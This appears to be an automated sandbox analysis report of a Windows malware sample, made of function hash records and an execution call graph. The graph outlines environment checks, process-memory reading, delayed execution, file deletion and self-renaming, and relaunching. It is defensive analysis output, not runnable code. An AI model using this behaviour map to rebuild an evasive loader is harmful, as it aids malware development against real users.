                                                                                    • API String ID: 2118026453-2084237596
                                                                                    • Opcode ID: e979a1c2e8b28cbdd30f358099e170a6c274479834ebf1913a87437cd094ecbb
                                                                                    • Instruction ID: 650a5112af3562332f06620903019bec3a4145895d739094df61fa2326fccf75
                                                                                    • Opcode Fuzzy Hash: e979a1c2e8b28cbdd30f358099e170a6c274479834ebf1913a87437cd094ecbb
                                                                                    • Instruction Fuzzy Hash: 49416671900609EFCF16DF98CC81AAEBBF5EF48306F1881D9F90877252D2359955DB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3___cftoe
                                                                                    • String ID: !%x
                                                                                    • API String ID: 855520168-1893981228
                                                                                    • Opcode ID: 0dd5a6febe746dc3d500bd7f46422cc4eb4cd592c6a77a3abfeab47f24f60e5c
                                                                                    • Instruction ID: b66656103488a6c38806f2a356a6a1e90796576dbb77bb6e6c18b613b67a7f7e
                                                                                    • Opcode Fuzzy Hash: 0dd5a6febe746dc3d500bd7f46422cc4eb4cd592c6a77a3abfeab47f24f60e5c
                                                                                    • Instruction Fuzzy Hash: 41314871D0020DABDF04DF94E881AEEB7F6FF08304F204499F815A7251DB75AA49CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3___cftoe
                                                                                    • String ID: !%x
                                                                                    • API String ID: 855520168-1893981228
                                                                                    • Opcode ID: 456694bad3e20905b58cdca9ebd988baf38288e13f0794d26dd9fab03261e75a
                                                                                    • Instruction ID: 3b7fb96fbeed9475513f3428fe24de9c2ec940374db8a78dd6248c9b59ccfefc
                                                                                    • Opcode Fuzzy Hash: 456694bad3e20905b58cdca9ebd988baf38288e13f0794d26dd9fab03261e75a
                                                                                    • Instruction Fuzzy Hash: FC317A32D15258AFEF01DF98E881BEEBBF5EF08301F104499F854A7242D7759A49CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00B35F86
                                                                                    • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,5D8D6CBB), ref: 00B35FF6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConvertFreeLocalString
                                                                                    • String ID: Invalid SID
                                                                                    • API String ID: 3201929900-130637731
                                                                                    • Opcode ID: 97a0e022e6bf10834c0e0659712b309e33ea66ccb794028640780ed6b2b2a818
                                                                                    • Instruction ID: 3b258047d094be956c87f2652ddee266bfa8fdac58abb33ac6c1da72974567eb
                                                                                    • Opcode Fuzzy Hash: 97a0e022e6bf10834c0e0659712b309e33ea66ccb794028640780ed6b2b2a818
                                                                                    • Instruction Fuzzy Hash: 9821C0B0A046059BDB24DF58C815BAFBBF8FF44714F10455DE405A7380DBB56A44CBD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B3909B
                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B390FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                    • String ID: bad locale name
                                                                                    • API String ID: 3988782225-1405518554
                                                                                    • Opcode ID: 007befa0ddf402c0276bf3cab0f0bb604db06983d58cd156a7cd1e21a118857d
                                                                                    • Instruction ID: 11ff8fde70f2a4fbfa5ccaf44e338b2417d4f9fbcade34f9f302dbcab8125a8e
                                                                                    • Opcode Fuzzy Hash: 007befa0ddf402c0276bf3cab0f0bb604db06983d58cd156a7cd1e21a118857d
                                                                                    • Instruction Fuzzy Hash: 4421D270805B84EED721CFA8C90474BBFF4EF19710F148A9DE49997781D3B9AA04CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_
                                                                                    • String ID: false$true
                                                                                    • API String ID: 2427045233-2658103896
                                                                                    • Opcode ID: e29af369ff46c38ca660650611481ab3324d76bf66f6d82f1539d5743aba8061
                                                                                    • Instruction ID: 74120d2f73a0fb4faeabbc6f29d9e06cf80922abad803eb4278a28694647c697
                                                                                    • Opcode Fuzzy Hash: e29af369ff46c38ca660650611481ab3324d76bf66f6d82f1539d5743aba8061
                                                                                    • Instruction Fuzzy Hash: 2711B171D40B85AEC724EFB8D441B9ABBF4AB04300F14C99AE491DB351EA70A604CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LocalFree.KERNEL32(00000000,00B34261,00B74400,000000FF,5D8D6CBB,00000000,?,00000000,?,?,?,00B74400,000000FF,?,00B33A75,?), ref: 00B34096
                                                                                    • LocalAlloc.KERNEL32(00000040,40000022,5D8D6CBB,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00B34154
                                                                                    • LocalAlloc.KERNEL32(00000040,3FFFFFFF,5D8D6CBB,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00B34177
                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B34217
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Local$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 2012307162-0
                                                                                    • Opcode ID: 7b2ec25f1a27a311e3f5df4590b7c4785c0edf28c0fdd577c2249eeabe2549d8
                                                                                    • Instruction ID: 1dd0bdeb24333424d84c74c9737995dbb4168b97f85b47fc290f876d0d6d46fe
                                                                                    • Opcode Fuzzy Hash: 7b2ec25f1a27a311e3f5df4590b7c4785c0edf28c0fdd577c2249eeabe2549d8
                                                                                    • Instruction Fuzzy Hash: A951B075A106059FDB18CF68C985AAEBBF5FB48340F2446ADE925E7380DB30BD40CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00B31E01
                                                                                    • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00B31E21
                                                                                    • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00B31EA7
                                                                                    • LocalFree.KERNEL32(00000001,5D8D6CBB,00000000,00000000,00B73C40,000000FF,?,00000000), ref: 00B31F2D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Local$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 2012307162-0
                                                                                    • Opcode ID: 7d5b92f43c973fa787e9de39ee4596424cca7a6bf55ffc9b7f8cc05e2bda53b9
                                                                                    • Instruction ID: 2ea9479d19313567378e9f956008a4cf1659747e57497044b5ac07fed77416e8
                                                                                    • Opcode Fuzzy Hash: 7d5b92f43c973fa787e9de39ee4596424cca7a6bf55ffc9b7f8cc05e2bda53b9
                                                                                    • Instruction Fuzzy Hash: DA51F4726042259FC715DF2CDC80A6ABBECFF49360F210AAEF866D7690DB31D9448791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:1.3%
                                                                                    Dynamic/Decrypted Code Coverage:98.2%
                                                                                    Signature Coverage:3.1%
                                                                                    Total number of Nodes:383
                                                                                    Total number of Limit Nodes:10
                                                                                    execution_graph 50710 180078460 50711 180078498 __GSHandlerCheckCommon 50710->50711 50712 1800784c4 50711->50712 50714 180070210 50711->50714 50715 18007021c 50714->50715 50715->50715 50716 180070253 VirtualAlloc 50715->50716 50717 180070278 50716->50717 50717->50712 50718 26387cf3ce4 50721 26387cf3cb4 50718->50721 50727 26387cf3868 50721->50727 50723 26387cf3cbd 50724 26387cf3cdb 50723->50724 50725 26387cf3ccf 50723->50725 50725->50723 50759 26387cfcb54 NtDelayExecution 50725->50759 50728 26387cf3888 50727->50728 50760 26387cf6328 50728->50760 50730 26387cf388d 50750 26387cf3891 50730->50750 50772 26387cf8560 50730->50772 50734 26387cf38bc 50735 26387cf8820 4 API calls 50734->50735 50734->50750 50736 26387cf38d7 50735->50736 50737 26387cf38ed GetCurrentProcess IsWow64Process 50736->50737 50736->50750 50738 26387cf391a 50737->50738 50737->50750 50783 26387cf68e8 GetAdaptersInfo 50738->50783 50740 26387cf391f 50741 26387cf3959 CreateMutexW 50740->50741 50740->50750 50742 26387cf3979 GetLastError 50741->50742 50741->50750 50743 26387cf399c GetModuleHandleW 50742->50743 50742->50750 50790 26387cf463c GetModuleHandleW GetCurrentProcessId 50743->50790 50747 26387cf39c1 50747->50750 50818 26387cf6864 NtAllocateVirtualMemory 50747->50818 50749 26387cf39d1 50749->50750 50819 26387cfd134 17 API calls new[] 50749->50819 50750->50723 50752 26387cf39e1 50820 26387cf378c 50752->50820 50755 26387cf39f9 50885 26387cf6250 CreateThread 50755->50885 50758 26387cf3a11 50758->50750 50759->50725 50762 26387cf6331 50760->50762 50761 26387cf6367 50761->50730 50762->50761 50886 26387cfa59c GetProcAddress 50762->50886 50764 26387cf6343 50764->50761 50887 26387cf9484 GetProcAddress 50764->50887 50766 26387cf634c 50766->50761 50888 26387cfa47c 50766->50888 50770 26387cf635e 50770->50761 50893 26387cfac50 GetProcAddress 50770->50893 50773 26387cf857e 50772->50773 50774 26387cf8590 RtlGetVersion 50773->50774 50775 26387cf859b 50773->50775 50774->50775 50776 26387cf85a5 GetVersionExW 50775->50776 50777 26387cf38b3 50775->50777 50776->50777 50778 26387cf8820 CreateToolhelp32Snapshot 50777->50778 50779 26387cfae1c 50778->50779 50780 26387cf8850 Process32FirstW 50779->50780 50781 26387cf886c Process32NextW 50780->50781 50782 26387cf888a CloseHandle 50780->50782 50781->50781 50781->50782 50782->50734 50784 26387cf6921 50783->50784 50785 26387cf6945 50783->50785 50787 26387cfad34 NtAllocateVirtualMemory 50784->50787 50786 26387cf6953 50785->50786 50788 26387cf7b40 NtFreeVirtualMemory 50785->50788 50786->50740 50789 26387cf692c GetAdaptersInfo 50787->50789 50788->50786 50789->50785 50936 26387cf7b80 50790->50936 50794 26387cf8560 2 API calls 50809 26387cf4690 50794->50809 50795 26387cf4743 GetCurrentProcessId 50795->50809 50796 26387cf478d GetCurrentProcessId OpenProcess 50797 26387cf47b4 NtQueryInformationProcess 50796->50797 50796->50809 50800 26387cf4b27 CloseHandle 50797->50800 50797->50809 50798 26387cf4c12 50801 26387cf39b1 50798->50801 50802 26387cf4c23 50798->50802 50800->50809 50801->50750 50817 26387cf6988 NtAllocateVirtualMemory 50801->50817 50947 26387cf4c38 CloseHandle NtFreeVirtualMemory 50802->50947 50803 26387cf476b 50803->50796 50946 26387cf841c NtFreeVirtualMemory GetModuleFileNameW NtAllocateVirtualMemory 50803->50946 50804 26387cf482a ReadProcessMemory 50804->50800 50807 26387cf4881 ReadProcessMemory 50804->50807 50805 26387cf4b3c 50805->50798 50808 26387cfbb2c NtAllocateVirtualMemory 50805->50808 50807->50800 50807->50809 50812 26387cf4b71 50808->50812 50809->50794 50809->50795 50809->50796 50809->50800 50809->50803 50809->50804 50809->50805 50810 26387cfad34 NtAllocateVirtualMemory 50809->50810 50811 26387cf4907 WideCharToMultiByte 50810->50811 50815 26387cf496a 50811->50815 50812->50798 50813 26387cf7b40 NtFreeVirtualMemory 50812->50813 50813->50798 50814 26387cf7b40 NtFreeVirtualMemory 50814->50800 50815->50814 50816 26387cf6298 MultiByteToWideChar NtAllocateVirtualMemory 50815->50816 50816->50815 50817->50747 50818->50749 50819->50752 50970 26387cf3250 50820->50970 50823 26387cf37b3 50823->50755 50829 26387cf33ac 50823->50829 50830 26387cf30d0 12 API calls 50829->50830 50831 26387cf33f7 50830->50831 50832 26387cf3404 50831->50832 50833 26387cf3250 12 API calls 50831->50833 50832->50755 50834 26387cf3410 50833->50834 50834->50832 50835 26387cfbb2c NtAllocateVirtualMemory 50834->50835 50836 26387cf3437 50835->50836 50837 26387cf6b9c 3 API calls 50836->50837 50838 26387cf3446 50837->50838 50839 26387cf6b9c 3 API calls 50838->50839 50840 26387cf3450 50839->50840 51081 26387cf7588 50840->51081 50842 26387cf3712 50843 26387cf7b40 NtFreeVirtualMemory 50842->50843 50843->50832 50844 26387cf345a 50844->50842 50845 26387cfbb2c NtAllocateVirtualMemory 50844->50845 50846 26387cf347c 50845->50846 50847 26387cf6b9c 3 API calls 50846->50847 50848 26387cf348b 50847->50848 51089 26387cf7504 50848->51089 50850 26387cf349d 50850->50832 50851 26387cf34dd wsprintfW 50850->50851 50852 26387cf3597 50851->50852 50853 26387cf34fd 50851->50853 50854 26387cf35cc wsprintfW 50852->50854 50855 26387cf3532 wsprintfW 50853->50855 50856 26387cf35f3 50854->50856 50857 26387cf355e 50855->50857 50858 26387cf3614 wsprintfW 50856->50858 50859 26387cf357f wsprintfW 50857->50859 50860 26387cf363f 50858->50860 50859->50860 51099 26387cf3728 50860->51099 50863 26387cf7b40 NtFreeVirtualMemory 50864 26387cf3668 50863->50864 50865 26387cf7b40 NtFreeVirtualMemory 50864->50865 50866 26387cf3672 50865->50866 50867 26387cf7b40 NtFreeVirtualMemory 50866->50867 50868 26387cf367f 50867->50868 51106 26387cf3c2c 50868->51106 50873 26387cfad34 NtAllocateVirtualMemory 50874 26387cf369f 50873->50874 50875 26387cf3703 ExitProcess 50874->50875 50876 26387cfba98 3 API calls 50874->50876 50875->50842 50877 26387cf36be 50876->50877 50878 26387cf36ea 50877->50878 50880 26387cfba98 3 API calls 50877->50880 51126 26387cfb400 50878->51126 50882 26387cf36d8 50880->50882 50883 26387cfba98 3 API calls 50882->50883 50883->50878 50884 26387cf7b40 NtFreeVirtualMemory 50884->50875 50885->50758 50886->50764 50887->50766 50891 26387cfa53f 50888->50891 50890 26387cf6355 50890->50761 50892 26387cf904c GetProcAddress 50890->50892 50891->50890 50894 26387cfa350 50891->50894 50892->50770 50893->50761 50906 26387cf8a94 50894->50906 50896 26387cfa36d 50896->50891 50897 26387cfa360 50897->50896 50912 26387cfba98 50897->50912 50899 26387cfa3af 50899->50896 50900 26387cfa3d5 FindFirstFileW 50899->50900 50901 26387cfa413 50900->50901 50904 26387cfa3f5 50900->50904 50916 26387cf7b40 50901->50916 50903 26387cfa3fc FindNextFileW 50903->50901 50903->50904 50904->50901 50904->50903 50905 26387cfa44e LoadLibraryW 50904->50905 50905->50901 50919 26387cfae1c 50906->50919 50909 26387cf8abe 50921 26387cfbb2c 50909->50921 50910 26387cf8ad4 50910->50897 50913 26387cfbab0 50912->50913 50926 26387cfba2c 50913->50926 50915 26387cfbad9 50915->50899 50917 26387cf7b7b 50916->50917 50918 26387cf7b5a NtFreeVirtualMemory 50916->50918 50917->50896 50918->50917 50920 26387cf8aaa GetSystemDirectoryW 50919->50920 50920->50909 50920->50910 50924 26387cfad34 NtAllocateVirtualMemory 50921->50924 50923 26387cfbb54 50923->50910 50925 26387cfad74 50924->50925 50925->50923 50929 26387cfb058 50926->50929 50928 26387cfba60 50928->50915 50930 26387cfb06c 50929->50930 50931 26387cfb087 50929->50931 50933 26387cf7b40 NtFreeVirtualMemory 50930->50933 50935 26387cfaf9c NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 50931->50935 50934 26387cfb079 50933->50934 50934->50928 50935->50934 50948 26387cf89d4 50936->50948 50941 26387cf8ae0 50942 26387cfae1c 50941->50942 50943 26387cf8afe GetUserNameA 50942->50943 50944 26387cf8b12 wsprintfA 50943->50944 50945 26387cf8b2b 50943->50945 50944->50945 50945->50809 50946->50803 50947->50801 50949 26387cf89f2 50948->50949 50950 26387cf8a04 FindFirstVolumeW 50949->50950 50951 26387cf8a25 GetVolumeInformationW FindVolumeClose 50950->50951 50952 26387cf7b89 50950->50952 50951->50952 50953 26387cf8bbc 50952->50953 50954 26387cf8be5 50953->50954 50963 26387cf8d4c 50954->50963 50957 26387cf4684 50957->50941 50958 26387cfad34 NtAllocateVirtualMemory 50959 26387cf8c07 50958->50959 50960 26387cf8c35 50959->50960 50968 26387cfb984 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 50959->50968 50961 26387cf7b40 NtFreeVirtualMemory 50960->50961 50961->50957 50964 26387cfad34 NtAllocateVirtualMemory 50963->50964 50965 26387cf8d68 50964->50965 50966 26387cf8bef 50965->50966 50969 26387cf8c4c wsprintfA 50965->50969 50966->50957 50966->50958 50968->50960 50969->50966 50971 26387cf89d4 3 API calls 50970->50971 50972 26387cf3276 50971->50972 51003 26387cf3194 50972->51003 50974 26387cf327e 50981 26387cf328b 50974->50981 51009 26387cf30d0 50974->51009 50977 26387cf7b40 NtFreeVirtualMemory 50979 26387cf3384 50977->50979 50978 26387cfba98 3 API calls 50980 26387cf3336 50978->50980 50979->50981 50983 26387cf7b40 NtFreeVirtualMemory 50979->50983 50982 26387cfba98 3 API calls 50980->50982 50986 26387cf335c 50980->50986 50981->50823 50987 26387cf6b9c 50981->50987 50984 26387cf3349 50982->50984 50983->50981 50985 26387cfba98 3 API calls 50984->50985 50984->50986 50985->50986 50986->50977 51076 26387cf8fe8 50987->51076 50990 26387cfba98 3 API calls 50991 26387cf6bd7 50990->50991 50992 26387cf6c12 50991->50992 50994 26387cfba98 3 API calls 50991->50994 50993 26387cf37c1 50992->50993 50995 26387cf7b40 NtFreeVirtualMemory 50992->50995 50999 26387cf77b0 50993->50999 50996 26387cf6bed 50994->50996 50995->50993 50996->50992 50997 26387cf6bf1 50996->50997 50998 26387cf7b40 NtFreeVirtualMemory 50997->50998 50998->50993 51000 26387cf77f1 50999->51000 51001 26387cf7803 RtlInitUnicodeString NtCreateFile 51000->51001 51002 26387cf37e5 NtClose 51001->51002 51002->50823 51004 26387cf31d6 51003->51004 51005 26387cf3215 wsprintfW 51004->51005 51006 26387cf3235 51005->51006 51008 26387cf3243 51005->51008 51007 26387cfbb2c NtAllocateVirtualMemory 51006->51007 51007->51008 51008->50974 51010 26387cf89d4 3 API calls 51009->51010 51011 26387cf30f6 51010->51011 51012 26387cf3194 2 API calls 51011->51012 51013 26387cf30fe 51012->51013 51017 26387cf310b 51013->51017 51022 26387cf7b98 51013->51022 51015 26387cf7b40 NtFreeVirtualMemory 51016 26387cf316c 51015->51016 51016->51017 51018 26387cf7b40 NtFreeVirtualMemory 51016->51018 51017->50978 51017->50986 51018->51017 51019 26387cf3116 51020 26387cfba98 3 API calls 51019->51020 51021 26387cf315e 51019->51021 51020->51021 51021->51015 51023 26387cf7bb5 51022->51023 51029 26387cf7bbf 51023->51029 51030 26387cfb154 51023->51030 51025 26387cf7e42 51026 26387cfba98 3 API calls 51025->51026 51025->51029 51027 26387cf7e65 51026->51027 51028 26387cf7b40 NtFreeVirtualMemory 51027->51028 51027->51029 51028->51029 51029->51019 51039 26387cf88f8 51030->51039 51033 26387cfba98 3 API calls 51034 26387cfb1a5 51033->51034 51038 26387cfb1bd 51034->51038 51051 26387cfb1d4 51034->51051 51035 26387cf7b40 NtFreeVirtualMemory 51037 26387cfb192 51035->51037 51037->51025 51038->51035 51040 26387cf895b 51039->51040 51043 26387cf8916 51039->51043 51041 26387cf896a RtlFormatCurrentUserKeyPath 51040->51041 51042 26387cf8979 51041->51042 51046 26387cf8951 51041->51046 51044 26387cfba98 3 API calls 51042->51044 51045 26387cfba98 3 API calls 51043->51045 51044->51046 51045->51046 51047 26387cfba98 3 API calls 51046->51047 51050 26387cf8955 51046->51050 51048 26387cf89af 51047->51048 51049 26387cf7b40 NtFreeVirtualMemory 51048->51049 51048->51050 51049->51050 51050->51033 51050->51037 51067 26387cfbf4c 51051->51067 51054 26387cfb20d 51054->51038 51056 26387cfb22c 51056->51054 51057 26387cfb246 NtQueryValueKey 51056->51057 51057->51054 51058 26387cfb27e 51057->51058 51059 26387cfad34 NtAllocateVirtualMemory 51058->51059 51060 26387cfb289 51059->51060 51061 26387cfb32f NtClose 51060->51061 51062 26387cfb29a NtQueryValueKey 51060->51062 51061->51054 51063 26387cfb2cb 51062->51063 51064 26387cfb2df 51062->51064 51065 26387cfad34 NtAllocateVirtualMemory 51063->51065 51066 26387cf7b40 NtFreeVirtualMemory 51064->51066 51065->51064 51066->51061 51068 26387cfbf66 51067->51068 51070 26387cfb209 51067->51070 51069 26387cfbb2c NtAllocateVirtualMemory 51068->51069 51069->51070 51070->51054 51071 26387cfb0c4 51070->51071 51072 26387cfbf4c NtAllocateVirtualMemory 51071->51072 51073 26387cfb0f1 51072->51073 51074 26387cfb0f5 51073->51074 51075 26387cfb108 NtOpenKey 51073->51075 51074->51056 51075->51074 51077 26387cfbb2c NtAllocateVirtualMemory 51076->51077 51078 26387cf9008 51077->51078 51079 26387cf6bbb 51078->51079 51080 26387cf7b40 NtFreeVirtualMemory 51078->51080 51079->50990 51079->50993 51080->51079 51082 26387cf75ae 51081->51082 51083 26387cf75c0 RtlInitUnicodeString 51082->51083 51131 26387cf7414 GetFileAttributesW 51083->51131 51086 26387cf760e NtCreateFile 51087 26387cf7607 51086->51087 51088 26387cf7673 NtClose 51086->51088 51087->50844 51088->51087 51133 26387cf79c8 51089->51133 51094 26387cf7537 51094->50850 51095 26387cf7572 51098 26387cf7b40 NtFreeVirtualMemory 51095->51098 51096 26387cf7568 51147 26387cf7694 RtlInitUnicodeString NtDeleteFile 51096->51147 51098->51094 51100 26387cf8ae0 2 API calls 51099->51100 51101 26387cf3762 51100->51101 51162 26387cf6298 51101->51162 51105 26387cf365e 51105->50863 51107 26387cf3c42 SetEvent 51106->51107 51108 26387cf3c4f 51106->51108 51107->51108 51109 26387cf3c59 ReleaseMutex CloseHandle 51108->51109 51110 26387cf3690 51108->51110 51109->51110 51111 26387cf3a24 51110->51111 51112 26387cf3a42 CreateFileW 51111->51112 51116 26387cf3695 51111->51116 51113 26387cf3a8a 51112->51113 51112->51116 51114 26387cfad34 NtAllocateVirtualMemory 51113->51114 51115 26387cf3af5 51114->51115 51115->51116 51117 26387cf3b1b SetFileInformationByHandle 51115->51117 51116->50873 51118 26387cf3b7b 51117->51118 51119 26387cf3b67 51117->51119 51121 26387cf7b40 NtFreeVirtualMemory 51118->51121 51120 26387cf7b40 NtFreeVirtualMemory 51119->51120 51120->51116 51122 26387cf3b85 CloseHandle CreateFileW 51121->51122 51122->51116 51123 26387cf3bd5 51122->51123 51124 26387cf3be9 SetFileInformationByHandle 51123->51124 51124->51116 51125 26387cf3c14 CloseHandle 51124->51125 51125->51116 51127 26387cfb41a 51126->51127 51128 26387cfb452 CreateProcessW 51127->51128 51129 26387cf36f9 51128->51129 51130 26387cfb4a6 CloseHandle CloseHandle 51128->51130 51129->50884 51130->51129 51132 26387cf7439 51131->51132 51132->51086 51132->51087 51134 26387cf77b0 2 API calls 51133->51134 51135 26387cf79fe 51134->51135 51136 26387cf7533 51135->51136 51148 26387cf7768 51135->51148 51136->51094 51141 26387cf7acc 51136->51141 51142 26387cf77b0 2 API calls 51141->51142 51143 26387cf7b07 51142->51143 51144 26387cf7557 51143->51144 51160 26387cf7a54 NtWriteFile 51143->51160 51144->51094 51144->51095 51144->51096 51147->51095 51156 26387cf7704 51148->51156 51151 26387cf78c0 51152 26387cfad34 NtAllocateVirtualMemory 51151->51152 51153 26387cf793a 51152->51153 51154 26387cf7957 NtReadFile 51153->51154 51155 26387cf7953 NtClose 51153->51155 51154->51155 51155->51136 51157 26387cf7721 51156->51157 51158 26387cf7730 NtQueryInformationFile 51157->51158 51159 26387cf7757 51158->51159 51159->51136 51159->51151 51161 26387cf7abc NtClose 51160->51161 51161->51144 51163 26387cf62b4 51162->51163 51164 26387cfad34 NtAllocateVirtualMemory 51163->51164 51165 26387cf62c9 51164->51165 51166 26387cf376a 51165->51166 51167 26387cf62f0 MultiByteToWideChar 51165->51167 51168 26387cfb344 51166->51168 51167->51166 51169 26387cfb35e 51168->51169 51171 26387cfb369 51169->51171 51172 26387cfc2c4 51169->51172 51171->51105 51173 26387cfc30c 51172->51173 51175 26387cfc317 51173->51175 51176 26387cfc478 51173->51176 51175->51171 51178 26387cfc4c3 51176->51178 51177 26387cfc4ce 51177->51175 51178->51177 51179 26387cf89d4 3 API calls 51178->51179 51182 26387cfc5c0 51179->51182 51180 26387cfc683 51181 26387cfad34 NtAllocateVirtualMemory 51180->51181 51188 26387cfc6a2 51181->51188 51182->51180 51183 26387cfad34 NtAllocateVirtualMemory 51182->51183 51184 26387cfc5ff 51183->51184 51185 26387cfc642 